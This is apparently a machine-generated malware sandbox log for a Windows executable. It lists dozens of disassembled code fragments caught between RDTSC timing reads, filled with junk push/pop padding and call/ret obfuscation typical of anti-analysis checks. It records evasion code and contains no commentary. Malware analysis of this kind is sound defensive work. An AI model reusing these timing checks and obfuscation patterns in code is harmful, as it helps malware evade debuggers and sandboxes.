Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF2F9 second address: DDF337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F43C9098CF7h 0x00000010 pop eax 0x00000011 or edi, 25FE2CFCh 0x00000017 lea ebx, dword ptr [ebp+12463DC2h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jnl 00007F43C9098CECh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF337 second address: DDF33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF33D second address: DDF341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD6BF6 second address: DD6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFE9DA second address: DFE9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F43C9098CEEh 0x0000000b jmp 00007F43C9098CEBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFE9F9 second address: DFE9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFECB8 second address: DFECBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFECBD second address: DFECC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFF2FC second address: DFF32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F43C9098CF6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFF32C second address: DFF336 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFF87E second address: DFF88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFF9FE second address: DFFA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFFA05 second address: DFFA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007F43C9098CE6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F43C9098CF7h 0x00000017 jmp 00007F43C9098CF6h 0x0000001c popad 0x0000001d jng 00007F43C9098CE8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFFA4D second address: DFFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD0011 second address: DD0019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DFFBB6 second address: DFFBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E001E6 second address: E00206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C9098CECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F43C9098CF2h 0x00000011 jnp 00007F43C9098CE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E00332 second address: E00338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E00338 second address: E0035F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C9098CEFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0035F second address: E00365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E00365 second address: E00369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E00369 second address: E0036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E004C2 second address: E004C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E004C6 second address: E004E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F43C8AE0084h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E004E2 second address: E00535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C9098D13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007F43C9098CF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0092E second address: E00932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E00932 second address: E0095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 jmp 00007F43C9098CF5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0095C second address: E00966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DCC936 second address: DCC954 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DCC954 second address: DCC95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E057AA second address: E057B4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E07A6D second address: E07A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD35F9 second address: DD35FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD35FF second address: DD3605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD3605 second address: DD3623 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F43C9098CE8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD3623 second address: DD3627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DD3627 second address: DD3639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0A1C0 second address: E0A1E4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0081h 0x00000008 jmp 00007F43C8AE007Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F43C8AE007Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0B3F4 second address: E0B3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0F445 second address: E0F450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0F450 second address: E0F457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FB5D second address: E0FB61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FB61 second address: E0FB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FB67 second address: E0FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F43C8AE008Ah 0x0000000d jnc 00007F43C8AE0078h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FD04 second address: E0FD09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12250 second address: E12254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1240B second address: E12416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F43C9098CE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12416 second address: E1241B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1241B second address: E12421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12957 second address: E1295C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1295C second address: E12966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12DAD second address: E12DCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F43C8AE0076h 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 jnc 00007F43C8AE0076h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12F11 second address: E12F37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 0A14A744h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12F37 second address: E12F4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F43C8AE0076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 jg 00007F43C8AE007Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E143FB second address: E14400 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E167BA second address: E167CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E16E0F second address: E16E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1A413 second address: E1A46D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F43C8AE0078h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D18D8h] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D2DBCh], esi 0x00000034 push 00000000h 0x00000036 mov edi, 1F4D0A95h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F43C8AE0084h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1A46D second address: E1A472 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC43D1 second address: DC4428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a js 00007F43C8AE0084h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F43C8AE007Ch 0x00000017 push edx 0x00000018 jc 00007F43C8AE0076h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F43C8AE0082h 0x00000028 jmp 00007F43C8AE0088h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1DA99 second address: E1DAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1DAA7 second address: E1DAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1DAAC second address: E1DAFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C9098CF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2873h], edx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2A85h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F43C9098CE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push eax 0x00000036 push ecx 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2094D second address: E2096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F43C8AE007Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21DB2 second address: E21DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21DB6 second address: E21DC0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DCE4CE second address: DCE4D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E283D4 second address: E283F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E283F4 second address: E283F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E283F8 second address: E2845B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, ebx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F43C8AE0078h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jnp 00007F43C8AE007Ah 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F43C8AE0078h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D35DEh], eax 0x0000004e xor dword ptr [ebp+124A1BD8h], eax 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2845B second address: E28466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E28466 second address: E2846A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E29421 second address: E29427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E29427 second address: E2942B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A58A second address: E2A59E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A59E second address: E2A5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A5BB second address: E2A5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2B69F second address: E2B6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2B6A3 second address: E2B6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21F64 second address: E21F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21F68 second address: E21F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E22051 second address: E22055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E22055 second address: E2205B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2C760 second address: E2C764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2964B second address: E2964F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2E72B second address: E2E732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E315B5 second address: E315D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 je 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31B67 second address: E31B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31B6E second address: E31BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F43C9098CE8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D1B58h], esi 0x0000002a push 00000000h 0x0000002c mov bl, 87h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2A69h] 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31BB1 second address: E31BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E32BF7 second address: E32BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E32BFB second address: E32C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43C8AE007Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31DB1 second address: E31DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jo 00007F43C9098CF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
